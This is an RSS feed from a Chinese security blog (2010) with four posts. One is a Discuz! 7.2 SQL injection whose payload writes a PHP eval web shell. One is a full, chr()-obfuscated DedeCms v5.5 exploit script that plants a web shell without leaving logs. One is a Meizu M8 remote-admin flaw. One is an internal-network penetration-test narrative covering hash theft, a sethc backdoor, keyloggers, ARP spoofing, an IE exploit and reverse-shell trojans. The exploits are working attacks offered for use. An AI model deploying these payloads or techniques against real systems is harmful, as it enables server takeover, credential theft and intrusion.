<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Chinadu`s Blog</title>
	<atom:link href="http://www.4shell.org/feed" rel="self" type="application/rss+xml" />
	<link>http://www.4shell.org</link>
	<description>关注网络安全</description>
	<lastBuildDate>Fri, 12 Mar 2010 03:53:51 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Discuz! 7.2 最新注入漏洞分析与利用</title>
		<link>http://www.4shell.org/archives/1616.html</link>
		<comments>http://www.4shell.org/archives/1616.html#comments</comments>
		<pubDate>Fri, 12 Mar 2010 03:53:51 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[Discuz]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1616.html</guid>
		<description><![CDATA[在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中，没有对传入的参数进行检查，在GPC为off的情况下，导致注入漏洞的产生。
漏洞分析：
文件./manyou/sources/notice.php
相关代码：
if($option == 'del') {
$appid = intval($_GET['appid']);
$db-&#62;query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&#38;action=invite');
} elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']);    //此处并没有进行过滤，直接导致注入的产生
if($action == 'invite') {
$query = $db-&#62;query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
if($value = $db-&#62;fetch_array($query)) {
$db-&#62;query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&#38;action=invite');
} else {
showmessage('manyou:noperm');
}
} else {
$db-&#62;query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND [...]]]></description>
			<content:encoded><![CDATA[<p>在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中，没有对传入的参数进行检查，在GPC为off的情况下，导致注入漏洞的产生。<br />
漏洞分析：<br />
文件./manyou/sources/notice.php</p>
<p>相关代码：</p>
<blockquote><p>if($option == 'del') {</p>
<p>$appid = intval($_GET['appid']);</p>
<p>$db-&gt;query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");</p>
<p>showmessage('manyou:done', 'userapp.php?script=notice&amp;action=invite');</p>
<p>} elseif($option == 'deluserapp') {</p>
<p>$hash = trim($_GET['hash']);    //此处并没有进行过滤，直接导致注入的产生</p>
<p>if($action == 'invite') {</p>
<p>$query = $db-&gt;query("SELECT * FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");</p>
<p>if($value = $db-&gt;fetch_array($query)) {</p>
<p>$db-&gt;query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");</p>
<p>showmessage('manyou:done', 'userapp.php?script=notice&amp;action=invite');</p>
<p>} else {</p>
<p>showmessage('manyou:noperm');</p>
<p>}</p>
<p>} else {</p>
<p>$db-&gt;query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND uid='$discuz_uid'");</p>
<p>showmessage('manyou:done', 'userapp.php?script=notice');</p>
<p>}</p>
<p>}
</p></blockquote>
<p><span id="more-1616"></span><br />
很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式，但如果当前数据库帐号有File_priv的话我们也可以直接into outfile</p>
<blockquote><p>/userapp.php?script=notice&amp;view=all&amp;option=deluserapp&amp;action=invite&amp;hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,</p>
<p>NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23</p></blockquote>
<p>0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E是<?php @eval($_POST['O']);?><br />
的十六进制表示。<br />
但想<br />
into outfile的话，我们还得有web的物理路径，有两种爆路径的方法<br />
/manyou/admincp.php?my_suffix=%0A%0DTOBY57<br />
/manyou/userapp.php?%0D%0A=TOBY57<br />
<h3>相关文章</h3>
<ul class="related_post">
<li><a href="http://www.4shell.org/archives/1167.html" title=" Discuz!NT 3.0 特殊环境下利用漏洞 "> Discuz!NT 3.0 特殊环境下利用漏洞 </a></li>
<li><a href="http://www.4shell.org/archives/1032.html" title="Discuz 群体攻击第三波出现">Discuz 群体攻击第三波出现</a></li>
<li><a href="http://www.4shell.org/archives/1015.html" title="Discuz!账号发放插件注入0day">Discuz!账号发放插件注入0day</a></li>
<li><a href="http://www.4shell.org/archives/567.html" title="Discuz! $_DCACHE数组变量覆盖漏洞">Discuz! $_DCACHE数组变量覆盖漏洞</a></li>
<li><a href="http://www.4shell.org/archives/1465.html" title="Discuz7 记录明文">Discuz7 记录明文</a></li>
<li><a href="http://www.4shell.org/archives/1464.html" title="discuz!7.1、7.2远程代码执行漏洞exploit">discuz!7.1、7.2远程代码执行漏洞exploit</a></li>
<li><a href="http://www.4shell.org/archives/1351.html" title="fckeditor漏洞,通杀PHPMPS">fckeditor漏洞,通杀PHPMPS</a></li>
<li><a href="http://www.4shell.org/archives/1154.html" title="XOOPS 2.2.6 鸡肋本地包含漏洞">XOOPS 2.2.6 鸡肋本地包含漏洞</a></li>
<li><a href="http://www.4shell.org/archives/1138.html" title="封堵Windows Server 2008几个明显漏洞">封堵Windows Server 2008几个明显漏洞</a></li>
<li><a href="http://www.4shell.org/archives/1135.html" title="动网多个版本上传漏洞">动网多个版本上传漏洞</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1616.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DedeCms v5.5 0day</title>
		<link>http://www.4shell.org/archives/1615.html</link>
		<comments>http://www.4shell.org/archives/1615.html#comments</comments>
		<pubDate>Wed, 10 Mar 2010 01:53:34 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[矩阵毒刺]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[DedeCMS]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1615.html</guid>
		<description><![CDATA[官方暂时没出补丁,不过我估计快了
执行成功会在在data/cache下生成t.php一句话小马
密码t,官方最新GBK和utf-8版本存在此漏洞,
此exp得特点是生产t.php得时候不留日志

&#60;?php
print_r('
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
');
if ($argc &#60; 3) {
print_r('
+----------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to dedecms
Example:
php '.$argv[0].' localhost /dedecms/
+----------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$post_a = 'plus/digg_ajax.php?id=1024e1024&#38;*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97)
.chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104)
.chr(101).chr(47).chr(116).chr(46).chr(112).chr(104)
.chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112)
.chr(104).chr(112).chr(32).chr(101).chr(118).chr(97)
.chr(108).chr(40).chr(36).chr(95).chr(80).chr(79)
.chr(83).chr(84).chr(91).chr(39).chr(116).chr(39)
.chr(93).chr(41).chr(59).chr(63).chr(62));/*';
$post_b = 'needCode=aa/../../../data/mysql_error_trace';
$shell = 'data/cache/t.php';
get_send($post_a);
post_send('plus/comments_frame.php',$post_b);
$content = post_send($shell,'t=echo tojen;');
if(substr($content,9,3)=='200'){
echo "\nShell Address is:".$host.$path.$shell;
}else{
echo "\nError.";
}
function get_send($url){
global $host, $path;
$message = "GET [...]]]></description>
			<content:encoded><![CDATA[<p>官方暂时没出补丁,不过我估计快了<br />
执行成功会在在data/cache下生成t.php一句话小马<br />
密码t,官方最新GBK和utf-8版本存在此漏洞,<br />
此exp得特点是生产t.php得时候不留日志</p>
<p><span id="more-1615"></span></p>
<blockquote><p>&lt;?php</p>
<p>print_r('</p>
<p>+----------------------------------------+</p>
<p>dedecms v5.5 final getwebshell exploit</p>
<p>+----------------------------------------+</p>
<p>');</p>
<p>if ($argc &lt; 3) {</p>
<p>print_r('</p>
<p>+----------------------------------------+</p>
<p>Usage: php '.$argv[0].' host path</p>
<p>host:      target server (ip/hostname)</p>
<p>path:      path to dedecms</p>
<p>Example:</p>
<p>php '.$argv[0].' localhost /dedecms/</p>
<p>+----------------------------------------+</p>
<p>');</p>
<p>exit;</p>
<p>}</p>
<p>error_reporting(7);</p>
<p>ini_set('max_execution_time', 0);</p>
<p>$host = $argv[1];</p>
<p>$path = $argv[2];</p>
<p>$post_a = 'plus/digg_ajax.php?id=1024e1024&amp;*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97)</p>
<p>.chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104)</p>
<p>.chr(101).chr(47).chr(116).chr(46).chr(112).chr(104)</p>
<p>.chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112)</p>
<p>.chr(104).chr(112).chr(32).chr(101).chr(118).chr(97)</p>
<p>.chr(108).chr(40).chr(36).chr(95).chr(80).chr(79)</p>
<p>.chr(83).chr(84).chr(91).chr(39).chr(116).chr(39)</p>
<p>.chr(93).chr(41).chr(59).chr(63).chr(62));/*';</p>
<p>$post_b = 'needCode=aa/../../../data/mysql_error_trace';</p>
<p>$shell = 'data/cache/t.php';</p>
<p>get_send($post_a);</p>
<p>post_send('plus/comments_frame.php',$post_b);</p>
<p>$content = post_send($shell,'t=echo tojen;');</p>
<p>if(substr($content,9,3)=='200'){</p>
<p>echo "\nShell Address is:".$host.$path.$shell;</p>
<p>}else{</p>
<p>echo "\nError.";</p>
<p>}</p>
<p>function get_send($url){</p>
<p>global $host, $path;</p>
<p>$message = "GET ".$path."$url  HTTP/1.1\r\n";</p>
<p>$message .= "Accept: */*\r\n";</p>
<p>$message .= "Referer: http://$host$path\r\n";</p>
<p>$message .= "Accept-Language: zh-cn\r\n";</p>
<p>$message .= "Content-Type: application/x-www-form-urlencoded\r\n";</p>
<p>$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";</p>
<p>$message .= "Host: $host\r\n";</p>
<p>$message .= "Connection: Close\r\n\r\n";</p>
<p>$fp = fsockopen($host, 80);</p>
<p>if(!$fp){</p>
<p>echo "\nConnect to host Error";</p>
<p>}</p>
<p>fputs($fp, $message);</p>
<p>$back = '';</p>
<p>while (!feof($fp))</p>
<p>$back .= fread($fp, 1024);</p>
<p>fclose($fp);</p>
<p>return $back;</p>
<p>}</p>
<p>function post_send($url,$cmd){</p>
<p>global $host, $path;</p>
<p>$message = "POST ".$path."$url  HTTP/1.1\r\n";</p>
<p>$message .= "Accept: */*\r\n";</p>
<p>$message .= "Referer: http://$host$path\r\n";</p>
<p>$message .= "Accept-Language: zh-cn\r\n";</p>
<p>$message .= "Content-Type: application/x-www-form-urlencoded\r\n";</p>
<p>$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";</p>
<p>$message .= "Host: $host\r\n";</p>
<p>$message .= "Content-Length: ".strlen($cmd)."\r\n";</p>
<p>$message .= "Connection: Close\r\n\r\n";</p>
<p>$message .= $cmd;</p>
<p>$fp = fsockopen($host, 80);</p>
<p>if(!$fp){</p>
<p>echo "\nConnect to host Error";</p>
<p>}</p>
<p>fputs($fp, $message);</p>
<p>$back = '';</p>
<p>while (!feof($fp))</p>
<p>$back .= fread($fp, 1024);</p>
<p>fclose($fp);</p>
<p>return $back;</p>
<p>}</p>
<p>?&gt;</p></blockquote>
<h3>相关文章</h3>
<ul class="related_post">
<li><a href="http://www.4shell.org/archives/1066.html" title="dedecms 5.3 – 5.5注入漏洞">dedecms 5.3 – 5.5注入漏洞</a></li>
<li><a href="http://www.4shell.org/archives/1548.html" title="瑞星本地提权通杀利用代码">瑞星本地提权通杀利用代码</a></li>
<li><a href="http://www.4shell.org/archives/1481.html" title="IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告">IE 极光0day攻击代码已经全面泄露 WebSense发出安全警告</a></li>
<li><a href="http://www.4shell.org/archives/1117.html" title="Gnuboard 0day&#038;Exp">Gnuboard 0day&#038;Exp</a></li>
<li><a href="http://www.4shell.org/archives/1112.html" title="新云4.0最新0day">新云4.0最新0day</a></li>
<li><a href="http://www.4shell.org/archives/1105.html" title="phpcms2008 最新0day &#038; Exp">phpcms2008 最新0day &#038; Exp</a></li>
<li><a href="http://www.4shell.org/archives/1097.html" title="PHP168 6.0及以下版本0day">PHP168 6.0及以下版本0day</a></li>
<li><a href="http://www.4shell.org/archives/1082.html" title="Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)">Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)</a></li>
<li><a href="http://www.4shell.org/archives/1015.html" title="Discuz!账号发放插件注入0day">Discuz!账号发放插件注入0day</a></li>
<li><a href="http://www.4shell.org/archives/977.html" title="Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability">Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1615.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>魅族M8手机远程管理权限漏洞</title>
		<link>http://www.4shell.org/archives/1614.html</link>
		<comments>http://www.4shell.org/archives/1614.html#comments</comments>
		<pubDate>Mon, 01 Mar 2010 01:58:04 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[M8]]></category>
		<category><![CDATA[魅族]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1614.html</guid>
		<description><![CDATA[魅族M8手机会打开80端口实现远程Web管理（Windows CE 远程管理工具），但是该管理程序在默认情况下未设置密码，远程访问者可以通过WiFi或者其他网络方式访问到手机的80端口设置密码并打开共享，远程访问者可以通过共享上传下载手机里的文件，同时也可以通过覆盖exe或写入启动文件夹的方式运行手机木马
相关文章

No Related Post

]]></description>
			<content:encoded><![CDATA[<p>魅族M8手机会打开80端口实现远程Web管理（Windows CE 远程管理工具），但是该管理程序在默认情况下未设置密码，远程访问者可以通过WiFi或者其他网络方式访问到手机的80端口设置密码并打开共享，远程访问者可以通过共享上传下载手机里的文件，同时也可以通过覆盖exe或写入启动文件夹的方式运行手机木马<br />
<h3>相关文章</h3>
<ul class="related_post">
<li>No Related Post</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1614.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>内网渗透案例</title>
		<link>http://www.4shell.org/archives/1613.html</link>
		<comments>http://www.4shell.org/archives/1613.html#comments</comments>
		<pubDate>Mon, 01 Mar 2010 01:51:11 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[内网渗透]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1613.html</guid>
		<description><![CDATA[

目录

一.           本次目标的环境.
1.1         内网网络拓图以及平台介绍.
1.2         渗透测试的目的.
1.3    此次渗透目标内容和范围.
1.4    规避的风险.
二.         此次内网渗透过程.
2.1         内网突破（Socket端口转发以及终端连接）.
2.2         [...]]]></description>
			<content:encoded><![CDATA[<div>
<div>
<p>目录</p>
</div>
<p>一.           本次目标的环境.</p>
<p>1.1         内网网络拓图以及平台介绍.</p>
<p>1.2         渗透测试的目的.</p>
<p>1.3    此次渗透目标内容和范围.</p>
<p>1.4    规避的风险.</p>
<p>二.         此次内网渗透过程.</p>
<p>2.1         内网突破（Socket端口转发以及终端连接）.</p>
<p>2.2         系统口令获取,Hash破解,管理软件密码破解.</p>
<p>2.3         社会工程学以及密码习惯组合字典扫描收集管理信息.</p>
<p>2.4         内网常用的IPC$共享入侵.</p>
<p>2.5    ARP探嗅以及ARP挂马突破员工PC.</p>
<p>2.6    ERP内部员工办公系统挂马（Internet Explorer Aurora Exploit 2010-01-17）利用.</p>
<p>2.7    利用同步数据软件进行渗透 .</p>
<p>2.8    利用IIS可写权限配合IIS6.0文件后缀名解析漏洞进行突破.</p>
<p>2.9    利用Windows XP 2K远程,local Exploits,溢出进行权限获取和提升.</p>
<p>3.0    以上方法配合反弹远程控制木马配合.</p>
<p>3.0.1   域内的HASH注入攻击突破（未实现成功）</p>
<p>三.         目标系统安全加固解决办法总结.</p>
<p>3.1    访问控制.</p>
<p>3.2        电信和网络安全.</p>
<p>3.3        安全管理与实践.</p>
<p>3.4       应用和系统开发安全.</p>
<p><span id="more-1613"></span></p>
<p><span style="font-family: Times New Roman;">1.1</span></p>
<p>内网网络拓图以及平台介绍</p>
<p>目标网络规模为一个三层交 换环境</p>
<p><span style="font-family: Times New Roman;">IP</span>地址分布以及业务分类</p>
<p><span style="font-family: Times New Roman;">192.168.100.X-192.168.103.X</span> 数据内部员工办公网路</p>
<p><span style="font-family: Times New Roman;">176.12.1.X-176.12.15.X</span> 为<span style="font-family: Times New Roman;">Web</span>于数据库支持网路</p>
<p><span style="font-family: Times New Roman;">192.168.11.X-192.168.11.255</span> 为空闲网络区域</p>
<p>总共分为三个域 <span style="font-family: Times New Roman;">shjt   cyts   ccit</span> 共<span style="font-family: Times New Roman;">467</span>台计算机</p>
<p>以上信息是在渗透过程中得到的</p>
<p>为了方便我改写了一个批处理</p>
<p>代码为</p>
<p><span style="font-family: Times New Roman;">============================domain.bat=======================</span></p>
<p><span style="font-family: Times New Roman;">@echo off</span></p>
<p><span style="font-family: Times New Roman;">setlocal ENABLEDELAYEDEXPANSION</span></p>
<p><span style="font-family: Times New Roman;">@FOR /F "usebackq    delims=, " %%J IN (`net view /domain ^|find "</span>命令執行成功<span style="font-family: Times New Roman;">" /v ^|find "The command  completed successfully." /v ^|find "</span>命令成功完成<span style="font-family: Times New Roman;">" /v ^|find "--" /v ^|find  "Domain" /v ^|find "" /v ^|find "</span>コマンドは正常に終了しました<span style="font-family: Times New Roman;">" /v /i`) do (</span></p>
<p><span style="font-family: Times New Roman;">@echo =====domain:%%J========</span></p>
<p><span style="font-family: Times New Roman;">@FOR /F "usebackq eol=;    delims=, " %%i in (`net view /domain:%%J ^|findstr ""`) DO (</span></p>
<p><span style="font-family: Times New Roman;">@FOR /F "usebackq eol=; tokens=1,2,3* delims="  %%a in (`echo %%i`) do (</span></p>
<p><span style="font-family: Times New Roman;">@FOR  /F "tokens=1,2,3,4* usebackq delims=: " %%K IN (`@ping -a -n 1 -w 100  %%a ^|findstr "Pinging"`) do (</span></p>
<p><span style="font-family: Times New Roman;">@echo %%L       %%M</span></p>
<p><span style="font-family: Times New Roman;">)</span></p>
<p><span style="font-family: Times New Roman;">)</span></p>
<p><span style="font-family: Times New Roman;">)</span></p>
<p><span style="font-family: Times New Roman;">)</span></p>
<p><span style="font-family: Times New Roman;">echo  %0</span></p>
<p><span style="font-family: Times New Roman;">==============================end===================================</span></p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015108kXQ.jpg" alt="" /></p>
<p>系 统类型.安装软件版本以及类别</p>
<p>Windows xp 2K以及Linux</p>
<p>Mssql2000 2005 Sybase  IIS5.0 6.0 内网系统全部采用麦咖啡企业级个别伺服器安装了数据同步软件</p>
<p>1.2</p>
<p>渗透测 试的目的</p>
<p>渗透测试一方面可以从攻击者的角度，检验业务系统的安全防护措施是否有效，各项安全策略是否得到贯彻落实；另一方面可以讲潜在的安 全风险以真实事件的方式凸现出来，从而有</p>
<p>助于提高相关人员对安全问题的认识水平。渗透测试结束后，立即进行安全加固，解决测试发现的安全问 题，从而有效地防止真实安全事件的发生</p>
<p>1.3</p>
<p>此次渗透目标内容和范围.</p>
<p>此次渗透的 为内容为目标数据库服务器以及员工办公PC..</p>
<p>1.4</p>
<p>规避的风险</p>
<p>此次渗透是在不影 响目标业务工作的前提下进行测试，个别渗透测试手法已在本地搭建测试完成之后再应用到目标，以保证目标业务正常，（如ARP探嗅 ARP  ERP办公系统挂马突破，其中IE0day利用测试已本地通过不会造成目标员工办公PC崩溃或者出现异常） .</p>
<p>此 次内网渗透过程</p>
<p>2.1</p>
<p><strong> </strong><strong>内网突破（Socket端口转发以及 终端连接）</strong></p>
<p>通过外網web服務器222.11.22.11(192.168.22.34)(假设IP）上的Web  Shell，连接内网ip為192.168.22.35的Mssql2005服务器,  当前账户权限为Sa.（账户密码通过查看Web.config得到）Sa账户是Mssql的默认的最高权限账户由于MSSQL服务是以SYSTEM权限运 行的，而MSSQL刚巧提供了一些能够执行命令的函数加入能成功利用，会得到一个SYSTEM权限，所以我认为这会有很大机会让我利用成功（如 xp_cmdshell xp_dirtree xp_fileexistxp_terminate_process sp_oamethod  sp_oacreate xp_regaddmultistring xp_regdeletekey xp_regdeletevalue  xp_regenumkeys xp_regenumvalues sp_add_job  sp_addtask     xp_regread  xp_regwrite xp_readwebtask xp_makewebtask  xp_regremovemultistring  sp_OACreate）由于SQL  服务器处于硬防之下，一般在防火墙做的限制都是禁止外部连接内网，没有限制由内置外的连接.我们通够Socket端口转发来进行突破.本地监听如图</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/0151093RT.jpg" alt="" /></p>
<p>本 地Mstsc.exe host 127.0.0.1:88</p>
<p><strong>2.2系统口令获取,Hash破解,管理软件密码破解</strong></p>
<p>这 之前替换sethc.exe为cmd.exe程序-系统做放大镜后门得到一个CMD  Shell为渗透提供方便（在渗透完成之后所有的目标文件都已经恢复）通过Cmd Shell连接本地Ftp Server Get  Hash.exe(系统口令哈希值获取工具）VNC4密码获取工具GUI版到当前主机，【VNC4的密码是保存在注册表中的地址 为：HKEY_LOCAL_MACHINESOFTWARERealVNCWinVNC4password 】抓取密码之后通过FTP  PUT返回本机.抓取没有出现提示14位以上，直接通过在线的LM密码查询网站进行查询如：</p>
<p>两个常用的Hash在线破解网站</p>
<p>http://cracker.offensive-security.com/index.php</p>
<p><span style="color: #6d5887;">http://www.objectif-securite.ch/en/products.php</span></p>
<p>得 到系统当前主机管理员密码为ccit2006 VNC4密码为如下图</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015109jEd.jpg" alt="" /></p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015109VvE.jpg" alt="" /></p>
</div>
<div>
<p><strong>2.5  运用社会工程学以及密码习惯字典进行扫描收集管理信息</strong></p>
<p>比如运用net group "domain admins"  /domain net localgroup administrators这些命令找到DC管理并  破解密码遇到这样的域我首先想到的是如何找到技术员和运维技术的计算机，这些计算机有可能保存这这个内网众多的敏感信息.</p>
<p>查看TCP以及端 口连接信息，记录那些IP与当前的数据库服务器的数据库端口进行连接以及其他的服务器软件连接信息然后进行进一步渗透.</p>
<p>可以使用 XSCAN（使用nessus nasl脚本更新X-Scan漏洞库）或者俄罗斯商用SSS扫描器对内网做一个完全的安全扫描</p>
<p>收集管理密 码.数据库账户密码,Web后台管理密码.,硬盘内留下的以往的各类密码，分析管理员使用密码的习惯以及组合方式.组合密码字典扫描C类地址.查看IE缓 存留下的Cookie信息  .验证管理员留下的连接其他终端留下的痕迹是否有效，并记录.以便组合成针对目标网络的字典.如发现管理留下的连接其他伺服器远程桌面的痕迹，验证并尝试 用当前主机密码登录.如失败，我留下一键盘记录器，如下图，支持ASP空间收信。</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015109yJP.jpg" alt="" /></p>
</div>
<div>
<p>分析管理登录日志，以便及时获取管理信息.或者安装其他内核级的键盘记录器以便获取管理使用的其他密 码，方便渗透. 组合字典进行C类扫描，如图</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/0151090Mm.jpg" alt="" /></p>
</div>
<p><strong>2.4  内网常用的IPC$共享入侵</strong></p>
<p>IPC$共享入侵时渗透公司企业内网一个比较快速的途径，（这也是企业内部员工密码安全意 识薄弱的弱点）为了增快渗透速度我决定放弃手工而选用图形界面化的工具，结合上一步骤扫描.,在上一步骤为了避免扫描器过多占用系统资源导致当前主机不稳 定的情况，在选择扫描模式和线程上注意调整，适应当前主机的承载能力，如图，进行的IPC$共享以及弱口令扫描利用</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015109EEE.jpg" alt="" /></p>
<p>在 以上步骤上为了方便我采用为存在漏洞的机器植入反弹木马</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015109DEC.jpg" alt="" /></p>
<p><strong> </strong><strong>2.5 </strong><strong> </strong><strong> </strong><strong> ARP探嗅以及ARP挂马突破员工PC.</strong></p>
<p>由于目标ARP设置存在安全缺陷，导致可以使用ARP探嗅和欺骗得到敏感数据 以及网页挂马我们选择的是该目标内网员工的ERP办公系统。在这次探嗅中我选用了两种大白鲨和cain （大白鲨截图丢失）如图</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/0151104B5.jpg" alt="" /></p>
<p>网页木马选择的是<span style="font-family: Times New Roman;">2010-01-17</span>发布的<span style="font-family: Times New Roman;">IE</span>漏 洞<span style="font-family: Times New Roman;">EXP</span>。成功获取到部分员工<span style="font-family: Times New Roman;">Windows XP</span>权限</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015110mck.jpg" alt="" /></p>
<p><strong> </strong><strong>2.6 </strong><strong> </strong><strong> </strong><strong> ERP内部员工办公系统挂马（Internet Explorer Aurora Exploit 2010-01-17）利用</strong></p>
<p>在 某些时候ARP挂马不一定生效，既然有了内部员工ERP办公WEB的权限那我就试试最新公布的Internet Explorer Aurora  Exploit   为了规避风险问题，我决定在本地测试Internet Explorer Aurora Exploit  的 稳定性，保证代码不造成目标员工PC电脑IE崩溃或者是程序异常（员工PC电脑的浏览器版本是在IPC$获取员工权限后查看所得）以下是部分测试截图，目 前metasploit3.34已经更新了EXP。</p>
<p>www.smxiaoqiang.cn</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015110S0o.jpg" alt="" /></p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015110EJg.jpg" alt="" /></p>
<p><strong>2.7 </strong><strong> </strong><strong> </strong><strong> 利用同步数据软件进行渗透</strong></p>
<p>很多企业内网都安装了为数据提供同步的软件，但是安全配置上的失误导致入侵者可以通过这个将 渗透木马病毒延伸到各个角落，利用文件数据同步软件进行渗透的思路就是在同步的数据或者文件中篡改或者添加可以获得SHELL的文件如，Web asp  PHP木马或者其他的补丁程序.（由于当时的图片已经丢失，就不做具体说明了）</p>
<p><strong> </strong><strong>2.8 </strong><strong> </strong><strong> </strong><strong> 利用IIS可写权限配合IIS6.0文件后缀名解析漏洞进行突破.</strong></p>
<p>在2009年初IIS6.0就被公布出了存在文件后 缀名解析漏洞，格式为x.asp;.jpg，很多的IIS6.0可写权限都是put到目标可以move成Web  Shell的时候出现失败的问题，我细心测试后发现可以结合这两个鸡肋做点文章。那就是move后缀时候用x.asp;.jpg来实现.如图。IIS权限 和安全配置失误一直是很多粗心大意的管理容易犯的问题</p>
<p>成功得到Web Shell  然后通过查看网站数据库配置信息来继续收集目标账户密码信息。</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015110zuU.jpg" alt="" /></p>
<p><strong>2.9 </strong><strong> </strong><strong> </strong><strong>利用Windows XP 2K远程,local Exploits,溢出进行权限获取和提升</strong></p>
<p>在 上一步骤渗透得到一Web  Shell，发现本机没有安装麦咖啡杀毒软件没有安装可供提升权限的第三方软件，通过systeminfo查看目标补丁信息如图</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015110jPE.jpg" alt="" /></p>
<p>我通过<span style="font-family: Times New Roman;">Churrasco.exe</span>来提权<span style="font-family: Times New Roman;">.</span>这个<span style="font-family: Times New Roman;">loacl  Exploits</span>是<span style="font-family: Times New Roman;">2008-06</span>发布的，相比之下成功率较高</p>
<p>也可以利用一些新的系统  软件漏洞进行权限提升针对这个系统我只找到这个可以</p>
<p>提升权限成功如图</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015110L8r.jpg" alt="" /></p>
<p><strong> </strong><strong>2.9 </strong><strong> </strong><strong> </strong><strong> 以上方法配合反弹远程控制木马配合.</strong></p>
<p>以上各类渗透手法的目的是获取权限，为了方便我使用远程控制软件，IPC$植入反 弹木马MSSQL连接上传植入木马执行.local Exploits  提权执行反弹木马都是可以的（我不赞成使用黑客工具，这次渗透式经过对方允许使用此类软件.这些软件会在对方系统植入档案改变设定.完成之后已经彻底清除 卸载恢复）</p>
<p>在这次渗透中共获取计算机权限52个，这其中达到了我们渗透的目标，内部员工办公PC，客户数据库等等，公司内部的MAIL邮箱 对付一个企业的发展来说做必要的渗透测试并对系统，数据加固是很重要的，部分如图：</p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/0151111Sr.jpg" alt="" /></p>
<p><img src="http://www.4shell.org/wp-content/uploads/images/2010/03/015111lLj.jpg" alt="" /></p>
